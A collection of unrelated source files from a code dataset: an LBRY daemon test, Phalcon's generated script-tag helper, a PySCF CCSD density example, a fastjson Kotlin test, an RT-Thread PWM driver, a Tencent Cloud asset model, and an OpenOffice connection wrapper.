        self.assertEqual(self.daemon.jsonrpc_settings_get()['lbryum_servers'][0], ('localhost', 50002))
        # settings_set returns the updated settings and persists the change.
        setting = self.daemon.jsonrpc_settings_set('lbryum_servers', ['server:50001'])
        self.assertEqual(setting['lbryum_servers'][0], ('server', 50001))
        self.assertEqual(self.daemon.jsonrpc_settings_get()['lbryum_servers'][0], ('server', 50001))
        # settings_clear reverts to the built-in default server list.
        setting = self.daemon.jsonrpc_settings_clear('lbryum_servers')
        self.assertEqual(setting['lbryum_servers'][0], ('spv11.lbry.com', 50001))
        self.assertEqual(self.daemon.jsonrpc_settings_get()['lbryum_servers'][0], ('spv11.lbry.com', 50001))
        # test_privacy_settings (merged for reducing test time, unmerge when its fast)
        # tests that changing share_usage_data propagates to the relevant properties
        self.assertFalse(self.daemon.jsonrpc_settings_get()['share_usage_data'])
        self.daemon.jsonrpc_settings_set('share_usage_data', True)
        self.assertTrue(self.daemon.jsonrpc_settings_get()['share_usage_data'])
        # Enabling the setting also switches the analytics manager on.
        self.assertTrue(self.daemon.analytics_manager.enabled)
        self.daemon.jsonrpc_settings_set('share_usage_data', False)
class TroubleshootingCommands(CommandTestCase):
    async def test_tracemalloc_commands(self):
        # Always disable tracing on teardown so later tests are unaffected.
        self.addCleanup(self.daemon.jsonrpc_tracemalloc_disable)
        self.assertFalse(self.daemon.jsonrpc_tracemalloc_disable())
        self.assertTrue(self.daemon.jsonrpc_tracemalloc_enable())
        class WeirdObject():
            pass
        # WARNING: tracemalloc_top reports the *source text* of the allocating
        # line and the assertEqual below matches it verbatim -- keep this
        # statement on one line and do not rename anything in it.
        hold_em = [WeirdObject() for _ in range(500)]
        top = self.daemon.jsonrpc_tracemalloc_top(1)
        self.assertEqual(1, len(top))
        self.assertEqual('hold_em = [WeirdObject() for _ in range(500)]', top[0]['code'])
        # The reported location is relative to the integration-test directory.
        self.assertTrue(top[0]['line'].startswith('other/test_other_commands.py:'))
        self.assertGreaterEqual(top[0]['count'], 500)
        self.assertGreater(top[0]['size'], 0)  # just matters that its a positive integer
| 1,038 |
7,737 | <filename>ext/phalcon/html/helper/script.zep.c
#ifdef HAVE_CONFIG_H
#include "../../../ext_config.h"
#endif
#include <php.h>
#include "../../../php_ext.h"
#include "../../../ext.h"
#include <Zend/zend_operators.h>
#include <Zend/zend_exceptions.h>
#include <Zend/zend_interfaces.h>
#include "kernel/main.h"
#include "kernel/array.h"
#include "kernel/memory.h"
#include "kernel/operators.h"
#include "kernel/object.h"
/**
* This file is part of the Phalcon.
*
* (c) <NAME> <<EMAIL>>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
/**
* Class Script
*/
/* Registers Phalcon\Html\Helper\Script with the Zend engine.  Note the class
 * extends the Style helper (phalcon_html_helper_style_ce), inheriting its
 * rendering machinery; only getAttributes/getTag are specialised here.
 * (Zephir-generated code: prefer editing the .zep source.) */
ZEPHIR_INIT_CLASS(Phalcon_Html_Helper_Script)
{
	ZEPHIR_REGISTER_CLASS_EX(Phalcon\\Html\\Helper, Script, phalcon, html_helper_script, phalcon_html_helper_style_ce, phalcon_html_helper_script_method_entry, 0);
	return SUCCESS;
}
/**
* Returns the necessary attributes
*
* @param string $href
* @param array $attributes
*
* @return array
*/
/* Builds the final attribute array for a <script> tag: the required pair
 * (src = $href, type = "text/javascript") first, followed by the caller's
 * attributes.  A caller-supplied "src" is removed so it can never override
 * the href; other keys (including "type") may override the defaults because
 * later string keys win in the merge (array_merge semantics). */
PHP_METHOD(Phalcon_Html_Helper_Script, getAttributes)
{
	zephir_method_globals *ZEPHIR_METHOD_GLOBALS_PTR = NULL;
	zval attributes, required;
	zval *href_param = NULL, *attributes_param = NULL;
	zval href;
	zval *this_ptr = getThis();

	ZVAL_UNDEF(&href);
	ZVAL_UNDEF(&attributes);
	ZVAL_UNDEF(&required);
#if PHP_VERSION_ID >= 80000
	bool is_null_true = 1;
	ZEND_PARSE_PARAMETERS_START(2, 2)
		Z_PARAM_STR(href)
		Z_PARAM_ARRAY(attributes)
	ZEND_PARSE_PARAMETERS_END();
#endif
	ZEPHIR_MM_GROW();
	zephir_fetch_params(1, 2, 0, &href_param, &attributes_param);
	zephir_get_strval(&href, href_param);
	zephir_get_arrval(&attributes, attributes_param);
	/* required = ["src" => href, "type" => "text/javascript"] */
	ZEPHIR_INIT_VAR(&required);
	zephir_create_array(&required, 2, 0);
	zephir_array_update_string(&required, SL("src"), &href, PH_COPY | PH_SEPARATE);
	add_assoc_stringl_ex(&required, SL("type"), SL("text/javascript"));
	/* strip any user-provided "src" before merging so href always wins */
	zephir_array_unset_string(&attributes, SL("src"), PH_SEPARATE);
	/* required first, user attributes second (later keys override) */
	zephir_fast_array_merge(return_value, &required, &attributes);
	RETURN_MM();
}
/**
* @return string
*/
/* Tag name used by the inherited Style-helper render logic. */
PHP_METHOD(Phalcon_Html_Helper_Script, getTag)
{
	zval *this_ptr = getThis();

	RETURN_STRING("script");
}
| 874 |
501 | #!/usr/bin/env python
#
# Author: <NAME> <<EMAIL>>
#
'''
CCSD and CCSD(T) density matrices
'''
import numpy
from pyscf import gto, scf, cc, ao2mo
# HF molecule, cc-pVDZ basis; mean-field RHF then CCSD on top of it.
mol = gto.M(
    atom = 'H 0 0 0; F 0 0 1.1',
    basis = 'ccpvdz')
mf = scf.RHF(mol).run()
mycc = cc.CCSD(mf).run()

#
# CCSD one- and two-particle density matrices in the MO basis
# (dm1 includes the mean-field contribution).
#
dm1 = mycc.make_rdm1()
dm2 = mycc.make_rdm2()

#
# Recompute the CCSD total energy from the density matrices:
#   E = sum_pq h_pq dm1_qp + 1/2 sum_pqrs (pq|rs) dm2_pqrs + E_nuc
# and check it against mycc.e_tot printed below.
#
# Core Hamiltonian transformed AO -> MO.
h1 = numpy.einsum('pi,pq,qj->ij', mf.mo_coeff.conj(), mf.get_hcore(), mf.mo_coeff)
nmo = mf.mo_coeff.shape[1]
# Full (nmo,nmo,nmo,nmo) ERI tensor in chemist notation (pq|rs).
eri = ao2mo.kernel(mol, mf.mo_coeff, compact=False).reshape([nmo]*4)
E = numpy.einsum('pq,qp', h1, dm1)
# Note dm2 is transposed to simplify its contraction to integrals
E+= numpy.einsum('pqrs,pqrs', eri, dm2) * .5
E+= mol.energy_nuc()
print('E(CCSD) = %s, reference %s' % (E, mycc.e_tot))

# When plotting CCSD density on grids, CCSD density matrices need to be
# transformed to AO basis representation.
dm1_ao = numpy.einsum('pi,ij,qj->pq', mf.mo_coeff, dm1, mf.mo_coeff.conj())

from pyscf.tools import cubegen
cubegen.density(mol, 'rho_ccsd.cube', dm1_ao)

###
#
# Compute CCSD(T) density matrices with ccsd_t-slow implementation
# (as of pyscf v1.7).  The (T) correction requires its own lambda equations;
# the resulting dm1/dm2 overwrite the plain-CCSD ones above.
#
from pyscf.cc import ccsd_t_lambda_slow as ccsd_t_lambda
from pyscf.cc import ccsd_t_rdm_slow as ccsd_t_rdm

eris = mycc.ao2mo()
conv, l1, l2 = ccsd_t_lambda.kernel(mycc, eris, mycc.t1, mycc.t2)
dm1 = ccsd_t_rdm.make_rdm1(mycc, mycc.t1, mycc.t2, l1, l2, eris=eris)
dm2 = ccsd_t_rdm.make_rdm2(mycc, mycc.t1, mycc.t2, l1, l2, eris=eris)
| 741 |
28,056 | package com.alibaba.json.bvt.kotlin;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.util.ASMUtils;
import junit.framework.TestCase;
import org.apache.commons.io.IOUtils;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.HashMap;
import java.util.Map;
/**
* Created by wenshao on 05/08/2017.
*/
public class DataClassSimpleTest extends TestCase {
public void test_user() throws Exception {
ExtClassLoader classLoader = new ExtClassLoader();
Class clazz = classLoader.loadClass("DataClassSimple");
String[] names = ASMUtils.lookupParameterNames(clazz.getConstructors()[0]);
System.out.println(JSON.toJSONString(names));
String json = "{\"a\":1001,\"b\":1002}";
Object obj = JSON.parseObject(json, clazz);
assertEquals("{\"a\":1001,\"b\":1002}", JSON.toJSONString(obj));
}
public static class ExtClassLoader extends ClassLoader {
Map<String, byte[]> resources = new HashMap<String, byte[]>();
public ExtClassLoader() throws IOException {
super(Thread.currentThread().getContextClassLoader());
{
byte[] bytes;
InputStream is = Thread.currentThread().getContextClassLoader().getResourceAsStream("kotlin/DataClassSimple.clazz");
bytes = IOUtils.toByteArray(is);
is.close();
resources.put("DataClassSimple.class", bytes);
super.defineClass("DataClassSimple", bytes, 0, bytes.length);
}
}
public InputStream getResourceAsStream(String name) {
byte[] bytes = resources.get(name);
if (bytes != null) {
return new ByteArrayInputStream(bytes);
}
return super.getResourceAsStream(name);
}
}
}
| 771 |
7,482 | /*
* Copyright (c) 2006-2021, RT-Thread Development Team
*
* SPDX-License-Identifier: Apache-2.0
*
* Change Logs:
* Date Author Notes
* 2020-1-13 Leo first version
*/
#include <board.h>
#include "drv_pwm.h"
#ifdef RT_USING_PWM
#if !defined(BSP_USING_TIM3_CH1) && !defined(BSP_USING_TIM3_CH2) && \
!defined(BSP_USING_TIM3_CH3) && !defined(BSP_USING_TIM3_CH4)
#error "Please define at least one BSP_USING_TIMx_CHx"
#endif
#endif /* RT_USING_PWM */
#define DRV_DEBUG
#define LOG_TAG "drv.pwm"
#include <drv_log.h>
#define MAX_PERIOD 65535
struct rt_device_pwm pwm_device;
struct n32_pwm
{
struct rt_device_pwm pwm_device;
TIM_Module* tim_handle;
rt_uint8_t channel;
char *name;
};
static struct n32_pwm n32_pwm_obj[] =
{
#ifdef BSP_USING_TIM3_CH1
PWM1_TIM3_CONFIG,
#endif
#ifdef BSP_USING_TIM3_CH2
PWM2_TIM3_CONFIG,
#endif
#ifdef BSP_USING_TIM3_CH3
PWM3_TIM3_CONFIG,
#endif
#ifdef BSP_USING_TIM3_CH4
PWM4_TIM3_CONFIG,
#endif
};
static rt_err_t drv_pwm_control(struct rt_device_pwm *device, int cmd, void *arg);
static struct rt_pwm_ops drv_ops =
{
drv_pwm_control
};
/* PWM_CMD_ENABLE / PWM_CMD_DISABLE: switch the requested channel's
 * capture/compare output on or off.  As before, the counter itself is
 * (re)enabled unconditionally afterwards, and channel numbers outside 1..4
 * are silently ignored. */
static rt_err_t drv_pwm_enable(TIM_Module* TIMx, struct rt_pwm_configuration *configuration, rt_bool_t enable)
{
    /* The enable/disable paths differ only in the CC state constant. */
    rt_uint32_t cap_cmp_state = enable ? TIM_CAP_CMP_ENABLE : TIM_CAP_CMP_DISABLE;

    switch (configuration->channel)
    {
    case 1:
        TIM_EnableCapCmpCh(TIMx, TIM_CH_1, cap_cmp_state);
        break;
    case 2:
        TIM_EnableCapCmpCh(TIMx, TIM_CH_2, cap_cmp_state);
        break;
    case 3:
        TIM_EnableCapCmpCh(TIMx, TIM_CH_3, cap_cmp_state);
        break;
    case 4:
        TIM_EnableCapCmpCh(TIMx, TIM_CH_4, cap_cmp_state);
        break;
    default:
        /* unknown channel: no CC change, matching the original behaviour */
        break;
    }

    TIM_Enable(TIMx, ENABLE);

    return RT_EOK;
}
/* PWM_CMD_GET: read the configured period and pulse (both nanoseconds) back
 * from the hardware registers -- AR (auto-reload), PSC (prescaler) and the
 * per-channel compare registers CCDAT1..4.
 *
 * NOTE(review): the timer clock is always taken from Pclk2Freq here, whereas
 * drv_pwm_set() derives it from SYSCLK (TIM1/TIM8) or PCLK1 (others).  If the
 * timer sits on APB1 the two conversions disagree -- confirm against the N32
 * clock tree. */
static rt_err_t drv_pwm_get(TIM_Module* TIMx, struct rt_pwm_configuration *configuration)
{
    RCC_ClocksType RCC_Clockstruct;
    rt_uint32_t ar, div, cc1, cc2, cc3, cc4;
    rt_uint32_t channel = configuration->channel;
    rt_uint64_t tim_clock;
    ar = TIMx->AR;
    div = TIMx->PSC;
    cc1 = TIMx->CCDAT1;
    cc2 = TIMx->CCDAT2;
    cc3 = TIMx->CCDAT3;
    cc4 = TIMx->CCDAT4;
    RCC_GetClocksFreqValue(&RCC_Clockstruct);
    tim_clock = RCC_Clockstruct.Pclk2Freq;
    /* Convert nanosecond to frequency and duty cycle. */
    /* tim_clock now in MHz, so counts * 1000 / tim_clock yields nanoseconds */
    tim_clock /= 1000000UL;
    configuration->period = (ar + 1) * (div + 1) * 1000UL / tim_clock;
    if(channel == 1)
        configuration->pulse = (cc1 + 1) * (div + 1) * 1000UL / tim_clock;
    if(channel == 2)
        configuration->pulse = (cc2 + 1) * (div+ 1) * 1000UL / tim_clock;
    if(channel == 3)
        configuration->pulse = (cc3 + 1) * (div + 1) * 1000UL / tim_clock;
    if(channel == 4)
        configuration->pulse = (cc4 + 1) * (div + 1) * 1000UL / tim_clock;
    return RT_EOK;
}
/* PWM_CMD_SET: program prescaler, auto-reload and compare registers from the
 * requested period/pulse pair (nanoseconds per the RT-Thread PWM contract).
 *
 * NOTE(review): with psc = (period/MAX_PERIOD + 1) * clock_MHz and the reload
 * value period/(period/MAX_PERIOD + 1), the resulting counter time works out
 * to roughly 1000x the requested nanosecond period, while drv_pwm_get()
 * converts counts back to ns exactly.  Verify against the reference
 * implementation (which divides by an additional 1000). */
static rt_err_t drv_pwm_set(TIM_Module* TIMx, struct rt_pwm_configuration *configuration)
{
    /* Init timer pin and enable clock */
    n32_msp_tim_init(TIMx);
    RCC_ClocksType RCC_Clock;
    RCC_GetClocksFreqValue(&RCC_Clock);
    rt_uint64_t input_clock;
    /* TIM1/TIM8 are fed from SYSCLK; the rest from PCLK1, doubled when the
       APB1 prescaler is not 1 (HCLK/PCLK1 != 1). */
    if ((TIM1 == TIMx) || (TIM8 == TIMx))
    {
        RCC_ConfigTim18Clk(RCC_TIM18CLK_SRC_SYSCLK);
        input_clock = RCC_Clock.SysclkFreq;
    }
    else
    {
        if (1 == (RCC_Clock.HclkFreq/RCC_Clock.Pclk1Freq))
            input_clock = RCC_Clock.Pclk1Freq;
        else
            input_clock = RCC_Clock.Pclk1Freq * 2;
    }
    /* Convert nanosecond to frequency and duty cycle. */
    rt_uint32_t period = (unsigned long long)configuration->period ;
    /* Split the period so the reload value fits the 16-bit counter. */
    rt_uint64_t psc = period / MAX_PERIOD + 1;
    period = period / psc;
    psc = psc * (input_clock / 1000000);
    /* TIMe base configuration */
    TIM_TimeBaseInitType TIM_TIMeBaseStructure;
    TIM_InitTimBaseStruct(&TIM_TIMeBaseStructure);
    TIM_TIMeBaseStructure.Period = period;
    TIM_TIMeBaseStructure.Prescaler = psc - 1;
    TIM_TIMeBaseStructure.ClkDiv = 0;
    TIM_TIMeBaseStructure.CntMode = TIM_CNT_MODE_UP;
    TIM_InitTimeBase(TIMx, &TIM_TIMeBaseStructure);
    rt_uint32_t pulse = (unsigned long long)configuration->pulse;
    /* PWM1 Mode configuration: Channel1 */
    OCInitType TIM_OCInitStructure;
    TIM_InitOcStruct(&TIM_OCInitStructure);
    TIM_OCInitStructure.OcMode = TIM_OCMODE_PWM1;
    TIM_OCInitStructure.OutputState = TIM_OUTPUT_STATE_ENABLE;
    TIM_OCInitStructure.Pulse = pulse;
    TIM_OCInitStructure.OcPolarity = TIM_OC_POLARITY_HIGH;
    /* Write the compare value to the channel picked by the caller and turn
       on preload so updates take effect at the next update event. */
    rt_uint32_t channel = configuration->channel;
    if(channel == 1)
    {
        TIM_InitOc1(TIMx, &TIM_OCInitStructure);
        TIM_ConfigOc1Preload(TIMx, TIM_OC_PRE_LOAD_ENABLE);
    }
    else if(channel == 2)
    {
        TIM_InitOc2(TIMx, &TIM_OCInitStructure);
        TIM_ConfigOc2Preload(TIMx, TIM_OC_PRE_LOAD_ENABLE);
    }
    else if(channel == 3)
    {
        TIM_InitOc3(TIMx, &TIM_OCInitStructure);
        TIM_ConfigOc3Preload(TIMx, TIM_OC_PRE_LOAD_ENABLE);
    }
    else if(channel == 4)
    {
        TIM_InitOc4(TIMx, &TIM_OCInitStructure);
        TIM_ConfigOc4Preload(TIMx, TIM_OC_PRE_LOAD_ENABLE);
    }
    TIM_ConfigArPreload(TIMx, ENABLE);
    /* Main-output enable (required for advanced timers TIM1/TIM8). */
    TIM_EnableCtrlPwmOutputs(TIMx, ENABLE);
    return RT_EOK;
}
/* Entry point of the PWM ops table: dispatch a framework command to the
 * matching helper.  `arg` carries a struct rt_pwm_configuration and the
 * device's user_data holds the TIM instance passed to
 * rt_device_pwm_register() in rt_hw_pwm_init().
 *
 * NOTE(review): unknown commands return positive RT_EINVAL while
 * rt_hw_pwm_init() uses negative -RT_ERROR; RT-Thread convention is negative
 * error codes -- confirm callers only compare against RT_EOK. */
static rt_err_t drv_pwm_control(struct rt_device_pwm *device, int cmd, void *arg)
{
    struct rt_pwm_configuration *configuration = (struct rt_pwm_configuration *)arg;
    TIM_Module *TIMx = (TIM_Module *)device->parent.user_data;
    switch (cmd)
    {
    case PWM_CMD_ENABLE:
        return drv_pwm_enable(TIMx, configuration, RT_TRUE);
    case PWM_CMD_DISABLE:
        return drv_pwm_enable(TIMx, configuration, RT_FALSE);
    case PWM_CMD_SET:
        return drv_pwm_set(TIMx, configuration);
    case PWM_CMD_GET:
        return drv_pwm_get(TIMx, configuration);
    default:
        return RT_EINVAL;
    }
}
static int rt_hw_pwm_init(void)
{
int i = 0;
int result = RT_EOK;
for(i = 0; i < sizeof(n32_pwm_obj) / sizeof(n32_pwm_obj[0]); i++)
{
if(rt_device_pwm_register(&n32_pwm_obj[i].pwm_device, n32_pwm_obj[i].name, &drv_ops, n32_pwm_obj[i].tim_handle) == RT_EOK)
{
LOG_D("%s register success", n32_pwm_obj[i].name);
}
else
{
LOG_D("%s register failed", n32_pwm_obj[i].name);
result = -RT_ERROR;
}
}
return result;
}
INIT_BOARD_EXPORT(rt_hw_pwm_init);
| 3,578 |
416 | <gh_stars>100-1000
/*
* Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.tencentcloudapi.cwp.v20180228.models;
import com.tencentcloudapi.common.AbstractModel;
import com.google.gson.annotations.SerializedName;
import com.google.gson.annotations.Expose;
import java.util.HashMap;
/**
 * Scheduled (plan) task record on a host asset, as returned by the CWP
 * asset-fingerprint APIs.  Auto-generated SDK model; comments translated
 * from the original Chinese.
 */
public class AssetPlanTask extends AbstractModel{

    /**
    * Default enabled state: 1 = enabled, 2 = not enabled
    */
    @SerializedName("Status")
    @Expose
    private Long Status;

    /**
    * Execution cycle (schedule)
    */
    @SerializedName("Cycle")
    @Expose
    private String Cycle;

    /**
    * Command or script to execute
    */
    @SerializedName("Command")
    @Expose
    private String Command;

    /**
    * User the task runs as
    */
    @SerializedName("User")
    @Expose
    private String User;

    /**
    * Configuration file path
    */
    @SerializedName("ConfigPath")
    @Expose
    private String ConfigPath;

    /**
    * Server IP
    */
    @SerializedName("MachineIp")
    @Expose
    private String MachineIp;

    /**
    * Server name
    */
    @SerializedName("MachineName")
    @Expose
    private String MachineName;

    /**
    * Operating system
    */
    @SerializedName("OsInfo")
    @Expose
    private String OsInfo;

    /**
    * Host Quuid
    */
    @SerializedName("Quuid")
    @Expose
    private String Quuid;

    /**
    * Host uuid
    */
    @SerializedName("Uuid")
    @Expose
    private String Uuid;

    /**
    * Data update time
    * Note: this field may return null, indicating that no valid value could be obtained.
    */
    @SerializedName("UpdateTime")
    @Expose
    private String UpdateTime;

    /**
     * Get default enabled state: 1 = enabled, 2 = not enabled
     * @return Status Default enabled state: 1 = enabled, 2 = not enabled
     */
    public Long getStatus() {
        return this.Status;
    }

    /**
     * Set default enabled state: 1 = enabled, 2 = not enabled
     * @param Status Default enabled state: 1 = enabled, 2 = not enabled
     */
    public void setStatus(Long Status) {
        this.Status = Status;
    }

    /**
     * Get execution cycle
     * @return Cycle Execution cycle
     */
    public String getCycle() {
        return this.Cycle;
    }

    /**
     * Set execution cycle
     * @param Cycle Execution cycle
     */
    public void setCycle(String Cycle) {
        this.Cycle = Cycle;
    }

    /**
     * Get command or script to execute
     * @return Command Command or script to execute
     */
    public String getCommand() {
        return this.Command;
    }

    /**
     * Set command or script to execute
     * @param Command Command or script to execute
     */
    public void setCommand(String Command) {
        this.Command = Command;
    }

    /**
     * Get user the task runs as
     * @return User User the task runs as
     */
    public String getUser() {
        return this.User;
    }

    /**
     * Set user the task runs as
     * @param User User the task runs as
     */
    public void setUser(String User) {
        this.User = User;
    }

    /**
     * Get configuration file path
     * @return ConfigPath Configuration file path
     */
    public String getConfigPath() {
        return this.ConfigPath;
    }

    /**
     * Set configuration file path
     * @param ConfigPath Configuration file path
     */
    public void setConfigPath(String ConfigPath) {
        this.ConfigPath = ConfigPath;
    }

    /**
     * Get server IP
     * @return MachineIp Server IP
     */
    public String getMachineIp() {
        return this.MachineIp;
    }

    /**
     * Set server IP
     * @param MachineIp Server IP
     */
    public void setMachineIp(String MachineIp) {
        this.MachineIp = MachineIp;
    }

    /**
     * Get server name
     * @return MachineName Server name
     */
    public String getMachineName() {
        return this.MachineName;
    }

    /**
     * Set server name
     * @param MachineName Server name
     */
    public void setMachineName(String MachineName) {
        this.MachineName = MachineName;
    }

    /**
     * Get operating system
     * @return OsInfo Operating system
     */
    public String getOsInfo() {
        return this.OsInfo;
    }

    /**
     * Set operating system
     * @param OsInfo Operating system
     */
    public void setOsInfo(String OsInfo) {
        this.OsInfo = OsInfo;
    }

    /**
     * Get host Quuid
     * @return Quuid Host Quuid
     */
    public String getQuuid() {
        return this.Quuid;
    }

    /**
     * Set host Quuid
     * @param Quuid Host Quuid
     */
    public void setQuuid(String Quuid) {
        this.Quuid = Quuid;
    }

    /**
     * Get host uuid
     * @return Uuid Host uuid
     */
    public String getUuid() {
        return this.Uuid;
    }

    /**
     * Set host uuid
     * @param Uuid Host uuid
     */
    public void setUuid(String Uuid) {
        this.Uuid = Uuid;
    }

    /**
     * Get data update time
     * Note: this field may return null, indicating that no valid value could be obtained.
     * @return UpdateTime Data update time
     * Note: this field may return null, indicating that no valid value could be obtained.
     */
    public String getUpdateTime() {
        return this.UpdateTime;
    }

    /**
     * Set data update time
     * Note: this field may return null, indicating that no valid value could be obtained.
     * @param UpdateTime Data update time
     * Note: this field may return null, indicating that no valid value could be obtained.
     */
    public void setUpdateTime(String UpdateTime) {
        this.UpdateTime = UpdateTime;
    }

    public AssetPlanTask() {
    }

    /**
     * NOTE: Any ambiguous key set via .set("AnyKey", "value") will be a shallow copy,
     * and any explicit key, i.e Foo, set via .setFoo("value") will be a deep copy.
     */
    public AssetPlanTask(AssetPlanTask source) {
        if (source.Status != null) {
            this.Status = new Long(source.Status);
        }
        if (source.Cycle != null) {
            this.Cycle = new String(source.Cycle);
        }
        if (source.Command != null) {
            this.Command = new String(source.Command);
        }
        if (source.User != null) {
            this.User = new String(source.User);
        }
        if (source.ConfigPath != null) {
            this.ConfigPath = new String(source.ConfigPath);
        }
        if (source.MachineIp != null) {
            this.MachineIp = new String(source.MachineIp);
        }
        if (source.MachineName != null) {
            this.MachineName = new String(source.MachineName);
        }
        if (source.OsInfo != null) {
            this.OsInfo = new String(source.OsInfo);
        }
        if (source.Quuid != null) {
            this.Quuid = new String(source.Quuid);
        }
        if (source.Uuid != null) {
            this.Uuid = new String(source.Uuid);
        }
        if (source.UpdateTime != null) {
            this.UpdateTime = new String(source.UpdateTime);
        }
    }

    /**
     * Internal implementation, normal users should not use it.
     */
    public void toMap(HashMap<String, String> map, String prefix) {
        this.setParamSimple(map, prefix + "Status", this.Status);
        this.setParamSimple(map, prefix + "Cycle", this.Cycle);
        this.setParamSimple(map, prefix + "Command", this.Command);
        this.setParamSimple(map, prefix + "User", this.User);
        this.setParamSimple(map, prefix + "ConfigPath", this.ConfigPath);
        this.setParamSimple(map, prefix + "MachineIp", this.MachineIp);
        this.setParamSimple(map, prefix + "MachineName", this.MachineName);
        this.setParamSimple(map, prefix + "OsInfo", this.OsInfo);
        this.setParamSimple(map, prefix + "Quuid", this.Quuid);
        this.setParamSimple(map, prefix + "Uuid", this.Uuid);
        this.setParamSimple(map, prefix + "UpdateTime", this.UpdateTime);
    }
}
| 4,021 |
679 | <reponame>Grosskopf/openoffice<gh_stars>100-1000
/**************************************************************
*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*
*************************************************************/
// MARKER(update_precomp.py): autogen include statement, do not remove
#include "precompiled_connectivity.hxx"
#include "ZConnectionWrapper.hxx"
#include <com/sun/star/sdbc/ColumnValue.hpp>
#include <com/sun/star/sdbc/XRow.hpp>
#include <com/sun/star/lang/DisposedException.hpp>
#include <comphelper/extract.hxx>
#include <cppuhelper/typeprovider.hxx>
#include <comphelper/sequence.hxx>
using namespace connectivity;
//------------------------------------------------------------------------------
using namespace com::sun::star::uno;
using namespace com::sun::star::lang;
using namespace com::sun::star::beans;
using namespace com::sun::star::sdbc;
// --------------------------------------------------------------------------------
// Wraps an aggregated SDBC connection: every XConnection call is forwarded
// to the delegate.  setDelegation() (from OConnectionWrapper) hooks
// _xConnection up as the aggregation delegate and fills m_xConnection.
OConnectionWeakWrapper::OConnectionWeakWrapper(Reference< XAggregation >& _xConnection)
	: OConnectionWeakWrapper_BASE(m_aMutex)
{
	setDelegation(_xConnection,m_refCount);
	OSL_ENSURE(m_xConnection.is(),"OConnectionWeakWrapper: Connection must be valid!");
}
//-----------------------------------------------------------------------------
// If nobody disposed us explicitly, do it now.  The ref-count bump keeps the
// object alive while dispose() runs so it is not destroyed re-entrantly.
OConnectionWeakWrapper::~OConnectionWeakWrapper()
{
	if ( !OConnectionWeakWrapper_BASE::rBHelper.bDisposed )
	{
		osl_incrementInterlockedCount( &m_refCount );
		dispose();
	}
}
// XServiceInfo
// --------------------------------------------------------------------------------
IMPLEMENT_SERVICE_INFO(OConnectionWeakWrapper, "com.sun.star.sdbc.drivers.OConnectionWeakWrapper", "com.sun.star.sdbc.Connection")
// --------------------------------------------------------------------------------
// The methods below all follow the same pattern: lock m_aMutex, refuse the
// call once the wrapper is disposed (checkDisposed throws DisposedException),
// then forward to the wrapped connection m_xConnection.
Reference< XStatement > SAL_CALL OConnectionWeakWrapper::createStatement( ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	return m_xConnection->createStatement();
}
// --------------------------------------------------------------------------------
Reference< XPreparedStatement > SAL_CALL OConnectionWeakWrapper::prepareStatement( const ::rtl::OUString& sql ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	return m_xConnection->prepareStatement(sql);
}
// --------------------------------------------------------------------------------
Reference< XPreparedStatement > SAL_CALL OConnectionWeakWrapper::prepareCall( const ::rtl::OUString& sql ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	return m_xConnection->prepareCall(sql);
}
// --------------------------------------------------------------------------------
::rtl::OUString SAL_CALL OConnectionWeakWrapper::nativeSQL( const ::rtl::OUString& sql ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	return m_xConnection->nativeSQL(sql);
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::setAutoCommit( sal_Bool autoCommit ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	m_xConnection->setAutoCommit(autoCommit);
}
// --------------------------------------------------------------------------------
sal_Bool SAL_CALL OConnectionWeakWrapper::getAutoCommit( ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	return m_xConnection->getAutoCommit();
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::commit( ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	m_xConnection->commit();
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::rollback( ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	m_xConnection->rollback();
}
// --------------------------------------------------------------------------------
// NOTE(review): unlike every other delegate, isClosed() deliberately(?) skips
// checkDisposed -- presumably so callers can still query the closed state
// after dispose(); confirm that m_xConnection remains valid at that point.
sal_Bool SAL_CALL OConnectionWeakWrapper::isClosed( ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	return m_xConnection->isClosed();
}
// --------------------------------------------------------------------------------
